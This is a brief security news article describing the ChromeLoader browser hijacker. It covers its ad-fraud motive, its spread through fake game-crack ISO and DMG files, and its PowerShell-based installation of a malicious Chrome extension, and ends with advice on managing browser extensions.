This month has seen an increase in ChromeLoader malware detections. There has been a steady stream of attacks since the beginning of the year.
ChromeLoader is a browser hijacker that modifies the settings of victims’ web browsers to display search results for phoney giveaways, unwanted software, surveys, pornographic games, and dating sites. The malware creators’ profit from a marketing affiliate system that directs user traffic to advertising websites.
Additionally, Twitter posts promoting cracked Android games and QR codes leading to malware-hosting sites have been discovered.
ChromeLoader is well-known for its size, spread, and persistence.
Use of PowerShell
ChromeLoader compromises its victims by using a malicious ISO archive file. The ISO is disguised as a cracked.exe for a game or programme in order to trick victims into downloading the file from torrent or malicious sites on their own.
In Windows 10 or later, double-clicking on the ISO file mounts it as a virtual CD-ROM drive. CS Installer[.]exe is a.exe file those purports to be a game crack or keygen. Finally, ChromeLoader runs and decodes a PowerShell command in order to retrieve an archive from a remote location. The archive is then installed as a Google Chrome plugin.
As a result of the scheduled task being removed by a PowerShell script, Chrome is infected with a covertly injected extension that hijacks the browser and tampers with search engine results.
Targets macOS as well
ChromeLoader is a malware that targets Mac OS X PCs and manipulates the Chrome and Safari web browsers. Furthermore, instead of ISO files, the infection chain on macOS employs DMG (Apple Disk Image) files.
The new report can aid in the development of a comprehensive defence against ChromeLoader. It also demonstrates how malicious attacks use suspicious ISO/DMG files and PowerShell execution. Users can manage, restrict, or remove extensions in Chrome and Safari to keep themselves safe.